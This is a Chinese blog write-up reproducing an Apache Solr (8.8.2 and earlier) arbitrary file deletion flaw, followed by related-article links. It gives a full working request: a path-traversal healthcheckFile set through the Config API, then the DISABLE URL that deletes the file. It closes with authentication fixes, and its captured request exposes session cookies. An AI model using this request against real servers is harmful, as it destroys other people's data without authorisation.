Apache Solr任意文件删除

最新推荐文章于 2024-10-17 10:47:14 发布
原创 最新推荐文章于 2024-10-17 10:47:14 发布
· 1k 阅读 · 19 ·
版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#apache #solr #lucene

漏洞描述:

Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。

在Solr <= 8.8.2中存在安全漏洞,这是个"任意"文件删除漏洞, 可以删除Files.delete()能删的任何文件。

复现过程:

1.访问http://ip:port,出现如下页面,开始实验

2.通过burp抓取该页面的包,并修改get请求

POST /solr/db/config HTTP/1.1

Host: ip:port

Pragma: no-cache

Cache-Control: no-cache

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.60

Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8

Referer: http://192.168.0.253:32778/solr/css/angular/common.css?_=8.1.1

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,en-GB-oxendict;q=0.5,en-IN;q=0.4,en-IE;q=0.3,en-AU;q=0.2,en-CA;q=0.1,en-ZA;q=0.1,en-NZ;q=0.1

Cookie: _ga=GA1.1.363030958.1704177735; splunkweb_csrf_token_8000=6625282306075854530; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1704247262; org.jboss.seam.core.TimeZone=Asia/Shanghai; org.jboss.seam.core.Locale=zh_CN; jiveforums.admin.logviewer=debug.size=0&info.size=7845&warn.size=12575&error.size=1257; CFADMIN_LASTPAGE_ADMIN=%2FCFIDE%2Fadministrator%2Fhomepage%2Ecfm; seraph.confluence=622593%3Aff675e8a943bce68e34506d8539ee37f0ccb1fdf; doc-sidebar=300px; PHPSESSID=7jdvdj1d4bra0b1uhq6b4697v4

Connection: close

Content-Length: 220

{

  "add-requesthandler": {

    "name": "/test_solr",

    "class":"solr.PingRequestHandler",

    "defaults":{"echoParams":"explicit"},

    "healthcheckFile":"../../../../../../../../../../../../../test.txt",

  }

}

3.检查是否创建成功

http://ip:port/solr/db/config/overlay?omitHeader=true


4.删除文件

​http://ip:port/solr/db/test_solr?action=DISABLE (test_solr为文件名)

5.创建文件

http://ip:port/solr/db/test_solr?action=ENABLE

借此漏洞,攻击者可以删除任何文件。

修复建议:

1、为Solr配置身份校验插件, 从而避免任意用户修改config;。

2、给Config API配置个身份验证, 且不对外开放。

慕筱蚺
关注
06solr 文件删除
千寻的博客
03-23 2014
Apache Solr 存在任意文件删除漏洞,在目前的最新版本(8.8.2)中仍然未被修复,漏洞的根本成因是函数 ****对要删除文件名并未做校验。同时 Apache Solr Config Api 对外开放,导致任意用户可修改配置,造成危害。
【漏洞复现】Apache Solr 身份认证绕过导致任意文件读取漏洞复现(CVE-2024-45216)
最新发布
m0_71944965的博客
12-06 1109
该漏洞存在于 Apache Solr 的 PKIAuthenticatonPlugin 中,该插件在启用Solr身份验证时默认启用。攻击者可以在Solr API路径末尾添加 /admin/inf0/key 的方式来绕过身份验证,以获取敏感数据或进行恶意操作。
Solr删除查询示例
纸上得来终觉浅,绝知此事要躬行
02-12 5624
Solr删除查询示例的示例中,我们将讨论Solr中可用的各种选项,以删除索引文档。 我们还将讨论Solr中提供的不同客户端选项。 为了演示删除查询用法,我们将使用基本配置在Solr中创建一个核心,并索引与Solr安装一起提供的示例文件
Solr删除文档数据
qq_29757467的博客
04-24 3137
删除无用的solr内容值
Solr中,如何有效地处理大量删除操作?
qq_33240556的博客
10-17 544
Apache Solr 中,处理大量删除操作时需要特别注意性能和资源管理。大量删除操作可能会导致索引碎片化、内存压力增加以及搜索性能下降。
solr删除数据
开心最重要
05-07 649
经常要操作solr索引库 记录删除solr的语法 首先打开索引库, 点击document 选择xml格式 输入 : 即可删除成功 是不是很简单
05、全文检索 -- Solr -- Solr 全文检索之图形界面的文档管理(文档的添加、删除,如何通过关键字等参数查询文档)
Java 领域技术分享
02-03 1549
Solr 全文检索之图形界面的文档管理(文档的添加、删除,如何通过关键字等参数查询文档)
Solr索引删除
dongyan3595的博客
10-27 1464
Solr索引删除
flamelu#Vulnerability-1#Apache Solr<= 8.8.2 (最新) 任意文件删除1
07-25
Apache Solr全版本存在任意文件删除漏洞,在Solr默认安装后无需任何其它配置即可删除系统任意文件。详情可以参考:
Apache Solr RemoteStreaming 文件读取与SSRF漏洞
m0_48520508的博客
04-28 651
0x00简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果. 0x01漏洞概述 Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取. 0x02影响范围 Apache Solr <= 8.8.1均受
全文检索(solr)实例
06-11
分词器和配置已经弄好了,只要按照网页说明把solr_home和solr_data放到D盘根目录下就可以了,solr放到tomcat下面。
Apache Solr漏洞复现汇总
千寻的博客
03-31 2144
Apache Solr漏洞复现汇总
solr删除数据的4种方便快捷的方式
热门推荐
蓝斯、的专栏
04-21 5万+
1、solr-用url,使用 stream 相关参数删除数据(我认为最方便的方法): 如: 根据id删除数据 http://localhost:8080/solr/update/?stream.body= id值&stream.contentType=text/xml;charset=utf-8&commit=true
Solr删除文档
chouxiaoru3968的博客
08-18 240
1、编写deldocs.xml文件,内容为 <delete><id>1</id></delete> 2、执行命令java -Durl=http://localhost:8983/solr/ABC/update-jar post.jar de...
solr删除所有文档方法
hanxue6898的博客
09-13 1301
 solr删除所有文档方法: &lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&lt;commit/&gt;  图片演示:
solr(八):管理solr cloud切片实例(增加和删除
小蚯蚓的博客
05-01 909
一、创建有两切片shard1/shard2的collection2 1.在浏览其中输入 http://hadoop01:8080/solr/admin/collections?action=CREATE&name=collection2&numShards=2&replicationFactor=2 2.输入结果 图形界面显示 二、删除集群实例colle...
Solr 直接删除文件达到清空索引目的
design321的专栏
10-30 4007
Solr 删除全部索引:http://localhost:8080/solr/update/?stream.body=*:*&stream.contentType=text/xml;charset=utf-8&commit=true solr 删除指定ID的索引:http://localhost:8080/solr/update/?stream.body=1&stream.contentType
solr通过连接数据库删除document 总结
u012632105的博客
11-23 684
1.编辑data-config.xml <?xml version="1.0" encoding="UTF-8"?> <!--solr的数据库连接删除doc--> <dataConfig> <dataSource name="dataSource1" type="JdbcDataSource" driver="com.mysql.cj.jdbc.Driver" url="jdbc:mysql
solr删除指定id文档,删除查询到是所有索引数据,删除所有数据
boss_way的博客
11-15 2138
1.1.1. 删除文档   都需要commit 删除索引格式如下:   1) 删除指定ID的索引 8   2) 删除查询到的索引数据 product_catalog_name:幽默杂货 3) 删除所有索引数据   *:*
Tomcat7中安装solr4.10.3的详细步骤
1. 首先,下载并解压Apache Solr的zip文件,例如solr-4.10.3.zip,这将创建一个包含Solr核心文件的目录。 2. 解压后的目录结构中,`example`目录包含了运行Solr的一个示例环境,包括必要的配置和启动脚本。 3. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值